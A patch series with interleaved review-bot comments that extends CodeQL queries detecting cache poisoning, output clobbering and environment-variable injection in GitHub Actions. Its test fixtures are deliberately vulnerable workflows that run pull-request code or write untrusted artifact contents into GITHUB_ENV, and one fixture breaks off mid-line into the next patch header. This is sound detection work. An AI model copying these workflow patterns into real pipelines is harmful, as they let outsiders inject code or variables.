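Review bot: The disjunction `artifact instanceof UntrustedArtifactDownloadStep or artifact instanceof PRHeadCheckoutStep` is introduced here in `artifactToOutputStoreStep` and repeated verbatim in the later hunks for `artifactToEnvStoreStep`, `artifactDownloadToRunStep` and `artifactDownloadToUsesStep`, and again in `CachePoisoning.ql`. One named class, for example `class UntrustedFileSourceStep extends Step { UntrustedFileSourceStep() { this instanceof UntrustedArtifactDownloadStep or this instanceof PRHeadCheckoutStep } }`, would keep all five sites in step when another untrusted-file source is added. The QLDoc still reads "A download artifact step followed by …" and the predicate names still say `artifactDownload…`, so the documentation no longer states that a PR-head checkout is treated as a source too. The predicate bodies continue outside the hunks.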
@@ -185,7 +190,7 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da outputsPartialFileContent(value) ) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - download.getAFollowingStep() = run and + artifact.getAFollowingStep() = run and pred.asExpr() = run.getScriptScalar() and succ.asExpr() = run ) @@ -199,7 +204,11 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da * echo "bar=${foo}" >> "$GITHUB_ENV" */ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string content, string key, string value, UntrustedArtifactDownloadStep download | + exists(Run run, string content, string key, string value, Step artifact | + ( + artifact instanceof UntrustedArtifactDownloadStep or + artifact instanceof PRHeadCheckoutStep + ) and ( // A file is read and its content is assigned to an env var // - run: | @@ -223,7 +232,7 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF outputsPartialFileContent(value) ) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - download.getAFollowingStep() = run and + artifact.getAFollowingStep() = run and pred.asExpr() = run.getScriptScalar() and // we store the taint on the enclosing job since there may not be an implicit env attribute succ.asExpr() = run.getEnclosingJob() 
@@ -234,10 +243,14 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF * A download artifact step followed by a step that may use downloaded artifacts. */ predicate artifactDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(UntrustedArtifactDownloadStep download, Run run | - pred.asExpr() = download and + exists(Step artifact, Run run | + ( + artifact instanceof UntrustedArtifactDownloadStep or + artifact instanceof PRHeadCheckoutStep + ) and + pred.asExpr() = artifact and succ.asExpr() = run.getScriptScalar() and - download.getAFollowingStep() = run + artifact.getAFollowingStep() = run ) } @@ -245,11 +258,15 @@ predicate artifactDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { * A download artifact step followed by a envvar-injection uses step . */ predicate artifactDownloadToUsesStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(UntrustedArtifactDownloadStep download, Uses uses | + exists(Step artifact, Uses uses | + ( + artifact instanceof UntrustedArtifactDownloadStep or + artifact instanceof PRHeadCheckoutStep + ) and madSink(succ, "envvar-injection") and - pred.asExpr() = download and + pred.asExpr() = artifact and succ.asExpr() = uses and - download.getAFollowingStep() = uses + artifact.getAFollowingStep() = uses ) } diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 6b17e77e063..75d8cd5d2e0 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.21 +version: 0.1.22 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 3b69110ed12..6609dae2b7f 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql 
@@ -12,6 +12,7 @@ */ import actions +import codeql.actions.security.ArtifactPoisoningQuery import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps @@ -19,13 +20,17 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getNextStep() = b } -from LocalJob j, Event e, PRHeadCheckoutStep checkout, Step s +from LocalJob j, Event e, Step artifact, Step s where + ( + artifact instanceof PRHeadCheckoutStep or + artifact instanceof UntrustedArtifactDownloadStep + ) and j.getATriggerEvent() = e and // job can be triggered by an external user e.isExternallyTriggerable() and // the checkout is not controlled by an access check - not exists(ControlCheck check | check.protects(checkout, j.getATriggerEvent())) and + not exists(ControlCheck check | check.protects(artifact, j.getATriggerEvent())) and ( // the workflow runs in the context of the default branch runsOnDefaultBranch(e) @@ -38,8 +43,7 @@ where ) ) and // the job checkouts untrusted code from a pull request - // TODO: Consider adding artifact downloads as a potential source of cache poisoning - j.getAStep() = checkout and + j.getAStep() = artifact and ( // the job writes to the cache // (No need to follow the checkout step as the cache writing is normally done after the job completes) @@ -49,9 +53,9 @@ where or // the job executes checked-out code // (The cache specific token can be leaked even for non-privileged workflows) - checkout.getAFollowingStep() = s and + artifact.getAFollowingStep() = s and s instanceof PoisonableStep and // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() ) -select s, checkout, s, "Potential cache poisoning in the context of the default branch" +select s, artifact, s, "Potential cache poisoning in the context of the default branch" 
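Review bot: After this change `artifact` can be an `UntrustedArtifactDownloadStep`, but the comments `// the checkout is not controlled by an access check` and `// the job checkouts untrusted code from a pull request`, and the variable name itself when it holds a checkout, still describe only one of the two cases. I would reword them to `// the checkout or artifact download is not guarded by a control check` and `// the job checks out untrusted code or downloads an untrusted artifact`. `check.protects(artifact, j.getATriggerEvent())` is now also asked about download steps. Whether every `ControlCheck` is modelled so that it meaningfully protects an artifact download cannot be seen from this hunk and is worth confirming, because a check that wrongly "protects" a download suppresses the alert. The commit's diffstat shows no cache-poisoning test fixture for the artifact path, so the new branch appears to be untested.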
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index d17bc34b9ab..ce8ab4c24dd 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.21 +version: 0.1.22 groups: [actions, queries] suites: codeql-suites extractor: javascript diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml new file mode 100644 index 00000000000..8f691ed759d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml @@ -0,0 +1,15 @@ +on: + pull_request_target + +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: artifact + run: | + echo "::set-output name=pr_number::$( Date: Mon, 15 Jul 2024 21:00:54 +0200 Subject: [PATCH 0420/1267] feat(queries): Experimental Output clobbering query --- .../security/OutputClobberingQuery.qll | 43 +++++++++++++++++++ .../CWE-094/OutputClobberingMedium.ql | 31 +++++++++++++ .../.github/workflows/output_clobbering1.yml | 20 +++++++++ .../.github/workflows/output_clobbering2.yml | 14 ++++++ 4 files changed, 108 insertions(+) create mode 100644 ql/lib/codeql/actions/security/OutputClobberingQuery.qll create mode 100644 ql/src/Security/CWE-094/OutputClobberingMedium.ql create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll new file mode 100644 index 00000000000..f1811ed5762 --- /dev/null +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll 
@@ -0,0 +1,43 @@
+private import actions
+private import codeql.actions.TaintTracking
+private import codeql.actions.dataflow.ExternalFlow
+private import codeql.actions.security.CodeInjectionQuery
+private import codeql.actions.security.ArtifactPoisoningQuery
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.DataFlow
+
+abstract class OutputClobberingSource extends Step { }
+
+class RunOutputClobbering extends OutputClobberingSource, Run {
+ RunOutputClobbering() {
+ exists(UntrustedArtifactDownloadStep download, string script |
+ download.getAFollowingStep() = this and
+ this.getScript() = script and
+ exists(int i |
+ script.splitAt("\n", i).matches(["%GITHUB_OUTPUT%", "%::set-output name%"]) and
+ i < count(string line | line = script.splitAt("\n") | line) - 1
+ )
+ )
+ }
+}
+
+/**
+ * A taint-tracking configuration for unsafe user input
+ * that is used to construct and evaluate a code script.
+ */
+private module OutputClobberingConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source.asExpr() instanceof OutputClobberingSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink }
+
+ predicate isAdditionalFlowStep(DataFlow::Node prev, DataFlow::Node succ) {
+ exists(StepsExpression e |
+ e.getTarget() = prev.asExpr() and
+ prev.asExpr() instanceof OutputClobberingSource and
+ succ.asExpr() = e
+ )
+ }
+}
+
+/** Tracks flow of unsafe user input that is used to construct and evaluate a code script. */
+module OutputClobberingFlow = TaintTracking::Global;
diff --git a/ql/src/Security/CWE-094/OutputClobberingMedium.ql b/ql/src/Security/CWE-094/OutputClobberingMedium.ql
new file mode 100644
index 00000000000..7094a7891da
--- /dev/null
+++ b/ql/src/Security/CWE-094/OutputClobberingMedium.ql
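Review bot: `RunOutputClobbering` only matches a `Run` that follows an `UntrustedArtifactDownloadStep`, so the `output_clobbering2.yml` fixture added in this same commit (a `pull_request_target` checkout of the PR head) does not appear to be covered. The `PRHeadCheckoutStep` case that the previous commit added to the flow steps should probably be accepted here as well. The last-line test `i < count(string line | line = script.splitAt("\n") | line) - 1` counts distinct line values as far as I can tell, so a script with repeated lines is under-counted. Counting indices instead, `count(int j | exists(script.splitAt("\n", j)))`, would say what is meant. The QLDoc on `OutputClobberingConfig` and `OutputClobberingFlow` is copied from the code-injection query, and `OutputClobberingSource` and `RunOutputClobbering` have none. A sentence stating that the source is a run step that writes `GITHUB_OUTPUT` or `::set-output` on a line other than its last, after an untrusted download, would make the heuristic reviewable.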
@@ -0,0 +1,31 @@
+/**
+ * @name Output Clobbering
+ * @description A Step output can be clobbered which may allow an attacker to manipulate the expected and trusted values of a variable.
+ * @kind path-problem
+ * @problem.severity warning
+ * @security-severity 5.0
+ * @precision medium
+ * @id actions/output-clobbering/medium
+ * @tags actions
+ * security
+ * external/cwe/cwe-094
+ * external/cwe/cwe-095
+ * external/cwe/cwe-116
+ */
+
+import actions
+import codeql.actions.security.OutputClobberingQuery
+import OutputClobberingFlow::PathGraph
+
+from OutputClobberingFlow::PathNode source, OutputClobberingFlow::PathNode sink
+where
+ OutputClobberingFlow::flowPath(source, sink) and
+ inPrivilegedContext(sink.getNode().asExpr()) and
+ // exclude cases where the sink is a JS script and the expression uses toJson
+ not exists(UsesStep script |
+ script.getCallee() = "actions/github-script" and
+ script.getArgumentExpr("script") = sink.getNode().asExpr() and
+ exists(getAToJsonReferenceExpression(sink.getNode().asExpr().(Expression).getExpression(), _))
+ )
+select sink.getNode(), source, sink, "Potential output clobbering leading to code injection in $@.",
+ sink, sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml
new file mode 100644
index 00000000000..9012eda2649
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml
@@ -0,0 +1,20 @@
+# It consumes an artifact produced by the First Workflow
+
+on: workflow_run
+jobs:
+ my-second-job:
+ runs-on: ubuntu-latest
+ steps:
+ - name: download pr artifact
+ uses: dawidd6/action-download-artifact@v2
+ with:
+ workflow: ${{github.event.workflow_run.workflow_id}}
+ run_id: ${{github.event.workflow_run.id}}
+ name: artifact
+
+ - id: version
+ run: |
+ echo "version=10" >> "${GITHUB_OUTPUT}"
+ ls
+ - run: echo ${{ steps.version.outputs.version }}
+
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml
new file mode 100644
index 00000000000..e2479e90636
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml
@@ -0,0 +1,14 @@
+on: pull_request_target
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - id: version
+ run: |
+ echo "version=10" >> "${GITHUB_OUTPUT}"
+ ls
+ - run: echo ${{ steps.version.outputs.version }}
+
From 15649afd5c2cfe2e53e0f643da1a62097adcafb3 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 22 Jul 2024 12:44:27 +0200 Subject: [PATCH 0421/1267] feat(queries): Improve envvar injection queries Consider those cases where the contents of a file are written to a var and that var assigned to GITHUB_ENV --- .../security/EnvPathInjectionQuery.qll | 20 ++++++- .../actions/security/EnvVarInjectionQuery.qll | 20 ++++++- .../CWE-077/.github/workflows/test8.yml | 41 ++++++++++++++ .../CWE-077/.github/workflows/test9.yml | 41 ++++++++++++++ .../CWE-077/EnvVarInjectionCritical.expected | 14 +++++ .../CWE-077/EnvVarInjectionMedium.expected | 10 ++++ .../CWE-094/.github/workflows/test11.yml | 56 +++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 21 +++++++ .../CWE-094/CodeInjectionMedium.expected | 19 +++++++ 9 files changed, 240 insertions(+), 2 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 41e72bc8388..ee9f4843470 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll 
@@ -20,7 +20,25 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and writeToGitHubPath(run, value) and - outputsPartialFileContent(value) + ( + outputsPartialFileContent(value) + or + // e.g. + // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_PATH + exists(string line, string var_name, string var_value | + run.getScript().splitAt("\n") = line + | + var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + outputsPartialFileContent(var_value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.matches("$(echo %") and value.indexOf(var_name) > 0 + ) + ) + ) ) } } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 8dba1a21c90..652b97b887f 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -22,7 +22,25 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { step.getAFollowingStep() = run and writeToGitHubEnv(run, content) and extractVariableAndValue(content, _, value) and - outputsPartialFileContent(value) + ( + outputsPartialFileContent(value) + or + // e.g. + // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_ENV + exists(string line, string var_name, string var_value | + run.getScript().splitAt("\n") = line + | + var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + outputsPartialFileContent(var_value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.matches("$(echo %") and value.indexOf(var_name) > 0 + ) + ) + ) ) } } 
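Review bot: `line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1)` has to match the whole line as far as I know, so an assignment that is indented (inside an `if` block, if `getScript()` keeps the script's own indentation) or prefixed with `export` is not recognised. The file → variable → `GITHUB_PATH` flow is then missed, which is a false negative for the query. Allowing leading whitespace and an optional keyword, e.g. `"\\s*(?:export\\s+)?([a-zA-Z0-9\\-_]+)=(.*)"`, keeps the group numbers and covers both cases. In the other direction, `value.matches("%$" + ["", "{", "ENV{"] + var_name + "%")` treats `_` in the variable name as a single-character wildcard and does not terminate the name, so a variable `foo` also matches `$foobar`. The same block is added verbatim to `EnvVarInjectionQuery.qll` in the next hunk, so moving it into one shared predicate would let both points be fixed once.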
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml new file mode 100644 index 00000000000..05bde57551d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml @@ -0,0 +1,41 @@ +name: Tests + +on: + workflow_run: + workflows: ["tests"] + types: + - completed + +permissions: { contents: read } + +jobs: + unit-test-results: + name: Test + runs-on: ubuntu-latest + permissions: + actions: write + statuses: write + checks: write + pull-requests: write + contents: write + steps: + - uses: actions/checkout@v4 + with: + ref: foo + + - name: Download and Extract Artifacts + uses: dawidd6/action-download-artifact@v6 + with: + run_id: ${{ github.event.workflow_run.id }} + path: ./artifacts + + - name: assignment + run: | + foo=$(cat ./artifacts/parent-artifacts/event.txt) + echo "foo=$foo" >> $GITHUB_ENV + - name: direct 1 + run: | + echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV + - name: direct 2 + run: | + echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml new file mode 100644 index 00000000000..3ed80374ef6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml 
@@ -0,0 +1,41 @@ +name: tests + +on: + workflow_run: + workflows: ["Tests"] + types: + - completed + +permissions: { contents: read } + +jobs: + get-artifacts: + name: Get required artifacts + runs-on: ubuntu-latest + permissions: + actions: read + statuses: write + steps: + - name: Download and extract event file + uses: actions/download-artifact@v4 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + run-id: ${{ github.event.workflow_run.id }} + name: event_file + path: artifacts/event_file + + - name: Try to read PR number + id: set-ref + run: | + pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json) + if [ -z "$pr_num" ] || [ "$pr_num" == "null" ]; then + pr_num="" + fi + + ref=$pr_num + if [ -z "$ref" ] || [ "$ref" == "null" ]; then + ref=${{ github.ref }} + fi + + echo "pr_num=$pr_num" >> $GITHUB_ENV + echo "ref=$ref" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 02aed1c05cb..7d92032f00b 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected 
@@ -15,6 +15,10 @@ edges | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -48,6 +52,12 @@ nodes | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | | .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | subpaths #select | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> 
$GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -66,3 +76,7 @@ subpaths | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | | .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | +| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index b3da13beda3..2cd36953802 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected 
